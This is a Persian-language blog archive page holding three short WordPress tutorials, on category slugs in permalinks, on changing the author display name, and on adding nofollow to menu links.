استفاده از شاخه ها و زیرشاخه های مختلف

فرض کنید که شما فایلهای نوشته وبلاگ خود را به چند شاخه یا زیرشاخه دسته بندی کرده اید. وردپرس فقط شامل یک شاخه و یک زیرشاخه است. اگر شما زیرشاخه را انتخاب نکنید، وردپرس شاخه والد را نشان می دهد.

وردپرس دسته را براساس حروف الفبا انتخاب میکند.به عنوان مثال اگر نوشته خود را در شاخه Apple and Technology قرار دهید، وردپرس فقط Apple را در آدرس اینترنتی نشان می دهد:

/http://example.com/apple/article-title-here

اگر شما نوشته خود را در شاخه Apple و زیرشاخه Technology قرار دهید، سپس وردپرس هر دو واژه را در آدرس اینترنتی نشان می دهد:

/http://example.com/apple/technology/article-title-here

اگر شما در وردپرس یک زیرشاخه را انتخاب کنید ولی شاخه والد را انتخای نکنید، وردپرس در آدرس اینترنتی شاخه والد را هم نشان خواهد داد.

در صورتیکه شما یک شاخه والد و مثلاً دو زیرشاخه دارید، وردپرس هر سه واژه را در آدرس اینترنتی نشان می دهد:

/http://example.com/apple/technology/events/article-title-here

نوشته اضافه کردن دسته بندی به آدرس مطالب وردپرس اولین بار در پدیدار شد.



لینک منبع مطلب

تغییر نام نویسنده در وردپرس

آیا در سایت وردپرس شما نامتان در پستها دیده نمیشود؟اخیرا برخی کاربران درمورد چگونه اضافه کردن نامشان در وردپرس سوال میکنند.وردپرس در طول راه اندازی در مورد وارد کردن نام کاربری از شما سوال میکند اما اسمی از شما نمیپرسد.سپس نام کاربری در تم وردپرس شما نمایش داده میشود مانند نام نویسنده یا سایت نویسنده.در این مقاله ما به شما روش اضافه کردن یا تغییر نام کاملتان در وردپرس را نشان خواهیم داد و اینکه وردپرس چگونه باید  نامتان را به خوبی پنل مدیریت نمایش دهد.

change-author-name

دلیل نیاز به استفاده از نام کامل در وردپرس

اغلب مردم به دلیل راحتی در به حافظه سپردن از نام کاربری هایی استفاده میکنند که ترکیبی از کلمات و حروف میباشد .چنین نام کاربریهایی زمانیکه نمایش داده میشوند به عنوان نام نویسنده به نظر کمی عجیب می آیند.شما باید نام کاربری را در وردپرس تغییر دهید اما در اینجا راه راحتتری برای تغییر نام شما معرفی می کنیم.زمانیکه شما نام منسجمی در مقابل نام کاربری دارید به نظر بسیار حرفه ای می آید.همچنین  به موتورهای جستجوی وابسته محتوا با نویسنده های خاص کمک میکند.  نام تجاری شخصی شما را ایجاد میکند و کاربران شما با نام شما آشنا میشوند و یا نویسنده های سایت شما را میشناسند.

 

افزودن یا تغییر دادن نام ها در وردپرس

 

اضافه کردن نام  به وردپرس برای استفاده از  نام در عوض نام کاربری بسیار راحت است.براحتی به بخش کاربران > شناسنامه شما مراجعه کنید.

 

اگر شما قادر به دیدن نام کاربران در منوی مدیر سایت نبودید این به معناست که شما در این سایت مدیر نیستید.شما باید از طریق کلیک کردن روی شناسنامه شناسنامه ی خود را تغییر دهید.شما نیاز دارید در پایین به بخش نام قسمتی که گزینه های اضافه کردن نام و نام کامل و نام مستعار است بروید.پس از کامل کردن این قسمت روی گزینه بعدی کلیک کنید.

 

اکنون شما باید نام یا نام کامل خود یا نام کاربریتان را انتخاب کنید تا با پستهای شما نمایش داده شود.بعد از انتخاب نامی که میخواهید استفاده کنید روی گزینه به روز کردن مشخصات برای ثبت تغییرات کلیک کنید.هم اکنون نامتان در قسمت بالا سمت راست نوار ابزار وردپرس دیده میشود.اگر شما از وب سایت خود بازدید کنید پستی که نام کامل شما را در عوض نام کاربریتان نمایش میدهد را خواهید دید.

نوشته تغییر نام نویسنده در وردپرس اولین بار در پدیدار شد.



لینک منبع مطلب

nofollow کردن لینک های منو در وردپرس

nofollow کردن لینک های منو در وردپرس

بسیاری از صاحبان سایت ترجیح می دهند یک برچسب nofollow به تمام لینک های خارجی خود اضافه کنند. اضافه کردن این ویژگی به لینک ها در وردپرس بسیار ساده است. با این حال این ویژگی در بخش مدیریت فهرست های وردپرس وجود ندارد. در این مقاله به شما نشان خواهیم داد که چطور لینک nofollow را به منوهای وردپرس بیافزایید. اولین کار اضافه کردن یک لینک خارجی  درست مثل افزودن لینک سفارشی به منوی وردپرس است. به سادگی به مسیر نمایش> فهرست ها رفته و روی لینک کلیک کنید. آدرس و متن لینک را وارد کنید سپس دکمه افزودن به منو را کلیک کنید.

 

nofollow-links

لینک خارجی اضافه شده در ستون ساختار منو نمایان می شود. روی فلش رو به پایین برای گسترش آیتم های منو کلیک کنید. سپس با کلیک بر روی دکمه تنظیمات صفحه در گوشه سمت چپ بالای صفحه نمایش، جعبه مربوط به لینک ارتباط (XFN) و گزینه های پیوند هدف را بررسی کنید.

در حرکت به سمت پایین متوجه دو گزینه خواهید شد: Link Relationship و  Open link in a new window/tab

 

باید در بخش realationship کلمه nofollow را وارد کنید. اگر می خواهید لینک مربوطه در صفحه ای جدید باز شود می توانید گزینه Open link in a new window/tab را تیک بزنید. در آخر دکمه ذخیره را برای اعمال تغییرات کلیک کنید.

 

اکنون می توانید سایت خود را مشاهده کنید. مطمئن شوید که ویژگی nofollow حتما به لینک شما اضافه شده باشد. می توانید با راست کلیک کردن لینک های خارجی را انتخاب و inspect element را بررسی کنید. پنجره مرورگر به دو قسمت تقسیم می شود. در پنجره پایین می توانید منبع HTML لینک خود را مشاهده کنید. این کار ویژگی nofollow را به همراه لینک آن نمایش خواهد داد.

نوشته nofollow کردن لینک های منو در وردپرس اولین بار در پدیدار شد.



لینک منبع مطلب

صفحه 10 از 1,256
»... قبلی 6789101112131415 بعدی 203040...«